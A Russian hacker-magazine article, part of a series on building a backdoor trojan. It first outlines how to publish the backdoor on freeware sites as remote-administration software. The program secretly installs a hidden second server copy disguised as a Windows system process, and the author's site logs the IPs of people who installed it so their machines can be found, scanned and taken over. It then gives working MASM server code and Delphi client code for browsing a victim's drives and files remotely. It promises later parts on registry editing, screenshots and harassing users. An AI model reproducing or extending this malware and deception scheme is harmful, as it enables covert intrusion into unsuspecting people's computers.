Продолжаем цикл статей по написанию BackDoor.
Первые части можно найти здесь
и на http://ww.danil.dp.ua.

Теперь о том, как можно "впарить"
серверную часть. Сразу скажу, что этого я не
делал в программе DTr v.1.3, которая лежит на http://www.danil.dp.ua.
Рассмотрим ТЕОРЕТИЧЕСКУЮ возможность на
примере моей программы. Пишем прогу (BackDoor).
Делаем сайт. Помещаем туда эту прогу с
подробным описанием, F.A.Q, и т.д. Подробно
описываем как она работает и как ее удалять.
В самой программе делаем копирование тела
сервера в двух экземплярах. Один как
описано, а другой экземпляр копируется один
раз на место, например, "internat.exe". Само
собой, "internat.exe" прерывается,
записывается под именем, например, "int.exe",
в самой проге есть запуск "int.exe" и
работает она, например, на 21 порту. Здесь
есть свои сложности. Скопировать "internat"
нужно только один раз. Если запускается наш
скрытый вариант, то имя приложения должно
быть одно, а если не скрытый — то то, которое
описано. Реализация данного проекта займет
время и придется "понаступать на грабли",
но без труда и русалку из пруда не достанешь.
Далее обзываем прогу "СУПЕР Удаленное
администрирование" и оформляем ее во
всех доступных серверах с бесплатными
программами, типа www.freesoft.ru, www.download.ru и т.п.
Некоторые прогу не разместят, но
большинство особо проверять не будут —
сунут и все. При оформлении нужно проявить
некоторые таланты человека, способного
продать снег эскимосам. 

Нас интересуют люди, которые так и хотят
взять BackDoor, проверить голимыми антивирами,
и в полной уверенности, что они крутые
хакеры (обновили базы вовремя), впарить
сервер какому-нибудь ламеру ушастому (любят
они такое словосочетание). Такая прога, в
принципе, нужна и шизопам. В общем,
клиентура будет. Также в самой проге нужно
сделать пару небольших глюков, которые
проявятся в клиенте, — чтобы на твой сайт
ходили (зачем — дале буде). Выпускать почаще
новые версии — вышеуказанные сервера сами
будут давать рекламу в своих рассылках.
Также сделать возможность задавать вопросы
по почте — из письма IP-адрес смотреть. Теперь
рассмотрим такую ситуацию. Любитель халявы
не удержится и запустит сервер у себя (мы ж
дали полное описание, как проверить у себя и
как сервер потом удалить). Потом он удалит
нашу серверную часть (официальную). Даже
перегрузит комп. Даже запустит firewall. Если
firewall отлавливает не только обращение по
портам, но и проги, которые на этот порт
сунутся, то облом. Его можно поздравить. Но в
основном это не так. Тут начинает
действовать наш скрытый сервер, который
работает по 21 порту и называется "internat".
Человек лезет в инет и идет на нашу
страничку смотреть описание, F.A.Q. и
обновления. А там засада. Мы уже написали
счетчик посещений, который дает полную
информацию кто откуда к нам пришел и его IP-адрес.
Можно оформиться в каком-нибудь рейтинге,
который дает не только эту информацию, но и
провайдера, регион, время посещения и т.д. 

Оформиться можно например в http://www.topping.com.ua.
Правда инфа будет только по регионам и
провайдерам Украины. Некоторые пользуются
proxy, но некоторые нет. Proxy может быть у его
провайдера. Для proxy прова и для тех, кто не
использует proxy совсем, нам понадобится
сканер по адресам (моя вторая статья на эту
тему). Дальше вроде все понятно. Сидим,
просматриваем статистику, сканим,
коннектимся и начинаем получать enjoy. Много
будет обломов, но если дал хорошую рекламу и
сумел заинтересовать, то будут и успехи. Все.
Более подробно рассказывать не буду и
исходники двойного сервера выкладывать
тоже не буду. Я высказал идею — остальное за
тобой. Скажу только что вместо "Internat"
лучше взять "systray", а вместо 21 порта — …(дальше
думай сам).

Продолжим разговор о реализации моего
клиента и сервера. В этой статье я дам
описание как получать список файлов и
каталогов с заданной директории на сервере
и как их показать в клиенте. Рассмотрим
кусок кода моего сервера с http://www.danil.dp.ua/dtr_s13s.zip.
Строки с 1867 по 1888 ("dtr13_s.asm"):

; ListFileToClient 
; Если команда = ld <path>
invoke lstrcmp, addr CommandStr, addr ListFileStr
.IF eax == 0
mov edi,Bufcmd
add edi,3
; Получаем <path>
invoke lstrcpy,addr CommandStr1,edi
invoke lstrlen, addr CommandStr1
invoke ltrim, addr CommandStr1, addr CommandStr1
invoke rtrim, addr CommandStr1, addr CommandStr1
invoke lstrcpy,addr path,addr CommandStr1
invoke lstrlen,addr path 
invoke ltrim, addr path, addr path
invoke rtrim, addr path, addr path
; Текущий каталог — <path>
invoke SetCurrentDirectory,addr path
.IF (eax == 0)
; Если нет, то текущий каталог — C:\
invoke SetCurrentDirectory,addr ListFileStr1
invoke lstrcpy, addr path,addr ListFileStr1
invoke ltrim, addr path, addr path
invoke rtrim, addr path, addr path
.ENDIF
; Запуск процы отсылки списка клиенту
invoke MyFilePath
jmp endREAD
.ENDIF

Здесь вроде все понятно — устанавливаем
текущий каталог, в случае 
ошибки, текущим каталогом будет C:\, и
вызываем процу, которая описана 
в строчках с 2288 по 2330 ("dtr13_s.asm"):

; FilePath
MyFilePath PROC 
; Обнуляем буфер отправки
invoke lstrcpy, addr BufStr0, addr NilStr
invoke rtrim, addr BufStr0, addr BufStr0 
; В буфере отправки в начале ставим "[[[ListFile
"
invoke lstrcat, addr BufStr0, addr ListFileStr02
invoke lstrcat, addr BufStr0, addr path
invoke lstrcat, addr BufStr0, addr ListFileStr3
invoke lstrlen, addr path
invoke lstrcpy, addr CommandStr3, addr path
invoke lstrcat, addr CommandStr3, addr wcs
; Вызываем FindFirstFile. Функция FindFirstFile находит 
; первый файл или каталог в текущей
директории. FindNextFile 
; находит остальные. В случае ошибки или
если файлы закончились,
; в eax у нас INVALID_HANDLE_VALUE
invoke FindFirstFile, addr CommandStr3, addr Finfo
mov cmd, eax
.IF eax != INVALID_HANDLE_VALUE
; Запускаем цикл поиска файлов
.WHILE TRUE 
invoke lstrcpy, addr CommandStr1, addr Finfo.cFileName
mov eax, Finfo.dwFileAttributes
and eax, FILE_ATTRIBUTE_DIRECTORY
; Если каталог, то выделяем
.IF (eax != 0)
invoke lstrcat, addr BufStr0, addr ListFileStr04
invoke lstrcat, addr BufStr0, addr CommandStr1
.ELSE
; Если файл то получаем размер
invoke lstrcat, addr BufStr0, addr CommandStr1
mov eax, Finfo.nFileSizeLow
invoke dwtoa, eax, addr CommandStr2
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr bkl
invoke lstrcat, addr BufStr0, addr CommandStr2
.ENDIF
; Добавляем строку в буфер отправки
invoke lstrcat, addr BufStr0, addr ListFileStr3
; Вызываем FindNextFile
invoke FindNextFile, cmd, addr Finfo
; Выходим если ошибка или файлы закончились
.BREAK .IF (eax == 0)
invoke lstrlen, addr BufStr0
; Выходим если достигли макс. размера буфера
.BREAK .IF (eax > 6400)
.ENDW
invoke FindClose, cmd
; Отправляем список файлов клиенту
invoke send,client,addr BufStr0,sizeof BufStr0,0
invoke Sleep,10
.ENDIF 
ret
MyFilePath ENDP

Посмотрим в сервере участок кода,
возвращающий список дисков 
в строках с 688 по 745:

; ListDir
.IF (dword ptr [edi] == "dl")
; Если команда ld
invoke rtrim, addr NilStr, addr BufStr0 
; В буфере отправки в начале ставим "[[[ListDrvr
"
invoke lstrcat, addr BufStr0, addr LstDrvStr005
invoke lstrcat, addr BufStr0, addr LstDrvStr000
invoke lstrcat, addr BufStr0, addr ListFileStr000
push edi
mov edi, offset LstDrvStr007
; Запускаем цикл по всем бьуквам англ.
алфавита:
.WHILE TRUE
invoke lstrcpyn,addr CommandStr0,edi ,2
.BREAK .IF (byte ptr [CommandStr0] < 30)
invoke rtrim, addr NilStr, addr CommandStr1
invoke lstrcat, addr CommandStr1, addr CommandStr0
invoke lstrcat, addr CommandStr1, addr bkl1
; Пытаемся получить тип драйвера текущей
буквы
invoke GetDriveType, addr CommandStr1
.IF eax == DRIVE_REMOVABLE 
; Если флоп и т.п.
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr CommandStr1
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr LstDrvStr001
invoke lstrcat, addr BufStr0, addr ListFileStr000
.ELSEIF eax == DRIVE_FIXED 
; Если жесткий
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr CommandStr1
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr LstDrvStr002
invoke lstrcat, addr BufStr0, addr ListFileStr000
.ELSEIF eax == DRIVE_REMOTE 
; Если сетевой
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr CommandStr1
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr LstDrvStr003
invoke lstrcat, addr BufStr0, addr ListFileStr000
.ELSEIF eax == DRIVE_CDROM 
; Если сидюк
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr CommandStr1
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr LstDrvStr004
invoke lstrcat, addr BufStr0, addr ListFileStr000
.ELSEIF eax == DRIVE_RAMDISK 
; Если в памяти
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr CommandStr1
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr NilStr
invoke lstrcat, addr BufStr0, addr LstDrvStr006
invoke lstrcat, addr BufStr0, addr ListFileStr000
.ENDIF
add edi,1
.ENDW
push edi
; Отправка клиенту
invoke send,client,addr BufStr0,sizeof BufStr0,0
invoke Sleep,10
jmp endREAD
.ENDIF

Теперь о клиенте. От сервера мы можем
получить список файлов и дисков. В начале
стоит "[[[ListFile <каталог>_#13_…" или
"[[[ListDrvr …" соответственно. Потом идут
строки с именами файлов, каталогов или
дисков, разделенных символом с кодом 13.
Теперь откроем наш клиент. В "Form1" в
"ToolBar1" создадим кнопку и назвем ее "Файловый
менеджер" и будет она называться
"ToolButton2" (см. мои предыдущие статьи).
Нажмем на нее 2 раза. В "Unit1.pas" запишем :

//Файловый менеджер
procedure TForm1.ToolButton2Click(Sender: TObject);
begin
Form3.Visible:=true;
if Form3.WindowState=wsMinimized then Form3.WindowState:=wsNormal;
Form3.MyRefresh;
end;

По нажатию нашей кнопки у нас будет
проявляться окно файлового менеджера.
Создадим новую форму ("Form3"). Процедура
"MyRefresh" будет объявлена в "Unit3.pas".
На форме "Form3", создадим:

"ToolBar1" (Win32) — панель управления;
"ToolButton1" — кнопка для обновить;
"Edit1" (Standart) — текущий диск на сервере;
"ListBox1" (Standart) — для списка файлов;
"Button1" (Standart) — показать список
зарегистр. на сервере дисков.

В свойстве "Sorted" "ListBox1" ставим "true".
В "MaxLen " "Edit1" ставим 1. Выбираем
собития "onChange" в "Edit1" (смена диска),
"onDblClick" в "ListBox1" (сменить каталог),
"onClick" в "ToolButton1" и "Button1" (обновить
список файлов и вывести список дисков), "onCreat"
в "Form3". Переходим в раздел кода
"Unit3.pas":

unit Unit3;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
StdCtrls, ToolWin, ComCtrls;
type
TForm3 = class(TForm)
ToolBar1: TToolBar;
Edit1: TEdit;
Label1: TLabel;
ListBox1: TListBox;
Button1: TButton;
ToolButton1: TToolButton;
procedure FormCreate(Sender: TObject);
procedure Edit1Change(Sender: TObject);
procedure ListBox1DblClick(Sender: TObject);
procedure Button1Click(Sender: TObject);
procedure ToolButton1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
//Получить список с сервера
procedure MyRefresh;
end;
var
Form3: TForm3;
// Переменные с текущим каталогом 
DopNDir : String;
DopDDir : String;

implementation
uses Unit1;
{$R *.DFM}
//При создании формы
procedure TForm3.FormCreate(Sender: TObject);
begin
// Текущий каталог в начале — C:\ 
DopDDir:=’C:\’;
DopNDir:=’C:\’;
Form3.Edit1.Text:=’C’;
end;
//Сменить диск
procedure TForm3.Edit1Change(Sender: TObject);
begin
if trim(Form3.Edit1.Text)<>copy(DopNDir,1,1) then begin
DopNDir:=trim(Form3.Edit1.Text)+’:\’;
Form3.MyRefresh;
end;
end;
//Обновить
procedure TForm3.ToolButton1Click(Sender: TObject);
begin
Form3.MyRefresh;
end;
//Получить список с сервера
procedure TForm3.MyRefresh;
begin
Form3.ListBox1.Items.Clear;
if Form1.ClientSocket1.Active then begin
Form1.ClientSocket1.Socket.SendText(‘ld ‘+trim(DopNDir));
end;
end;
// Войти в каталог
procedure TForm3.ListBox1DblClick(Sender: TObject);
var
DopS01, DopS02, DopS03 : String;
I : Integer;
begin
if (Form1.ClientSocket1.Active)and(Form3.ListBox1.Items.Count>0) then begin
if (Form3.ListBox1.ItemIndex<2)and(length(trim(DopNDir))>3) then begin
if length(DopNDir)>3 then begin
// Если в начало диска
if Form3.ListBox1.ItemIndex=0 then begin
Form1.ClientSocket1.Socket.SendText(‘ld ‘+copy(DopNDir,1,3)+#0);
end else begin
// Если на каталог назад
DopS01:=trim(DopNDir);
DopS02:=»;
DopS03:=»;
I:=1;
repeat
DopS02:=DopS02+DopS01[I];
if DopS01[I]=’\’ then begin
DopS03:=DopS03+DopS02;
DopS02:=»;
end;
inc(I);
until I=length(DopS01);
Form1.ClientSocket1.Socket.SendText(‘ld ‘+trim(DopS03)+#0);
end;
end;
end else begin
// Если войти в каталог
if copy(Form3.ListBox1.Items.Strings[Form3.ListBox1.ItemIndex],1,8)=’ DIR: ‘
then begin
Form1.ClientSocket1.Socket.SendText(‘ld ‘+trim(DopNDir)+trim(copy(Form3.ListBox1.Items.Strings[Form3.ListBox1.ItemIndex],9,length(Form3.ListBox1.Items.Strings[Form3.ListBox1.ItemIndex])-1))+’\’+#0);
end;
end;
end;
end;
// Показать список зарегистр. на сервере
дисков
procedure TForm3.Button1Click(Sender: TObject);
begin
Form1.ClientSocket1.Socket.SendText(‘ld’);
end;
end.

Переходим в раздел кода "Unit1.pas",
находим процедуру обработки очереди "TRecvThread.CommandRecvThread".
Для файлового менеджера перепишем ее так:

// обработка очереди
procedure TRecvThread.CommandRecvThread;
var
LstRdop : TLstRecv;
I : Integer;
DopS,Dop1,Dop2 : String;
label ex;
begin
LstRdop:=LstRbeg;
if LstRdop<>nil then begin
try
DopS:=»;
DopS:=LstRdop^.BufIn;

// Если в начале "[[[ListFile "
if copy(DopS,1,12)='[[[ListFile ‘ then begin
Form3.ListBox1.Items.Clear;
Form3.Enabled:=false;
I:=13;
Dop1:=»;
// Получаем текущий каталог
while not(ord(DopS[I])<30) do begin
Dop1:=Dop1+DopS[I];
inc(I);
end;
inc(I);
DopNDir:=Dop1;
// Пишем текущий диск
Form3.Edit1.Text:=copy(Dop1,1,1);
// Получаем все, кроме "[[[ListFile " и
текущего диска
Dop1:=copy(DopS,I,length(DopS)-I+1);
// И пишем в "ListBox1"
Form3.ListBox1.Items.Text:=Dop1;
if Form3.Visible then begin
if Form3.WindowState=wsMinimized then Form3.WindowState:=wsNormal;
Form3.SetFocus;
Form3.ListBox1.SetFocus;
Form3.ListBox1.ItemIndex:=0;
end;
Form3.Enabled:=true;
goto ex;
end;

// Если вначале "[[[ListDrvr "
if copy(DopS,1,12)='[[[ListDrvr ‘ then begin
I:=13;
Dop1:=»;
while not(ord(DopS[I])<30) do begin
Dop1:=Dop1+DopS[I];
inc(I);
end;
inc(I);
Dop2:=copy(DopS,I,length(DopS)-I+1);
// Выводим окно со списком дисков
Application.MessageBox(PChar(Dop2),PChar(Dop1),mb_Ok+mb_IconAsterisk+mb_ApplModal);
goto ex;
end;

// Если не список файлов и дисков
if trim(DopS)<>» then Form1.Memo1.Lines.Add(DopS+#13);
ex :
finally
if LstRDop^.Point<>nil then LstRbeg:=LstRDop^.Point
else LstRbeg:=nil;
if LstRbeg=nil then LstRend:=nil;
Dispose(LstRdop);
end;
end;
end;

Проверим. Запустим сервер и клиент.
Сконнектимся. Нажмем кнопку "Файловый
менеджер". В появившемся окне нажмем
"Button1". Все, проверка закончена. 

В следующих статьях мы рассмотрим:

* как запускать приложения на сервере;
* как редактировать реестр сервера;
* как издеваться над юзером;
* как закачивать файлы на сервер и с сервера;
* как получать дополнительную информацию с
сервера;
* как сделать снимок экрана сервера;
* как управлять запущенными процессами на
сервере;
и т.д.

P.S. Статья и программа предоставлена в целях
обучения и вся ответственность за их
использование целиком ложится на твои
хилые плечи.

Оставить мнение

Check Also

WWW: Netsim — игра, которая поможет изучить работу сетей и принципы атак

Тем, кто только начал разбираться с хакерской кухней, не помешает узнать, как работают сет…